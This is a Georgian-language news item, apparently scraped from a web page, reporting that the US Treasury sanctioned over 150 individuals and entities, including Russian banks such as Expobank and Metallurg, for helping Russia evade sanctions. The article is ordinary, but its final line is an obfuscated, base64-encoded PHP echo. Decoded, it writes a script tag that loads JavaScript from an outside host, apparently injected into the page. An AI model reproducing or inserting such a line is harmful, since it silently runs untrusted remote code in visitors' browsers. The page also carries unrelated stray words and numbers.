celsiusi
ავერსი საქკაბელი

აშშ-ის სახაზინო დეპარტამენტმა სანქციები დაუწესა 150-ზე მეტ ფიზიკური პირსა და სუბიექტს, რომლებიც ეხმარებიან რუსეთს შეზღუდვების თავიდან აცილებასა და მისი სამხედრო-სამრეწველო კომპლექსის გაძლიერებაში. ამის შესახებ აშშ-ის სახაზინო დეპარტამენტის გვერდზე გავრცელებულ ინფორმაციაშია აღნიშნული.

აშშ-ის სახაზინო დეპარტამენტის ცნობით, სანქციები მიზნად ისახავს მესამე ქვეყნებში ფიზიკური პირების, ერთეულებისა და ქსელების საქმიანობის შეჩერებას, რომლებიც ხელს უწყობენ რუსული სამხედრო-სამრეწველო ბაზის ძირითადი ტექნოლოგიების, აღჭურვილობისა და რესურსების გაყიდვას.

შეზღუდვებს დაექვემდებარა ათეულობით კომპანია თურქეთში, არაბთა გაერთიანებულ საამიროებში, ჩინეთში, შვეიცარიაში, სინგაპურში, ყირგიზეთში, ტაჯიკეთსა და მალდივებში.

აშშ-ის სახაზინო დეპარტამენტმა სანქციები დაუწესა რუსულ ბანკებს, Expobank-სა და Metallurg-ს, საინვესტიციო კომპანია United Investment Group-სა და ფინანსურ ინსტიტუტს Signal Invest-ს, რაც რუსეთის ფედერაციას საშუალებას აძლევდა, შეენარჩუნებინა კონტაქტი საერთაშორისო ფინანსურ სისტემასთან.

ამავდროულად, აშშ-ის სახაზინო დეპარტამენტი უწესებს სანქციებს 100-ზე მეტ სუბიექტსა და ფიზიკურ პირს, სანქციების გვერდის ავლისთვისა და უკრაინის წინააღმდეგ ომში რუსეთის დახმარებისთვის.

215
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");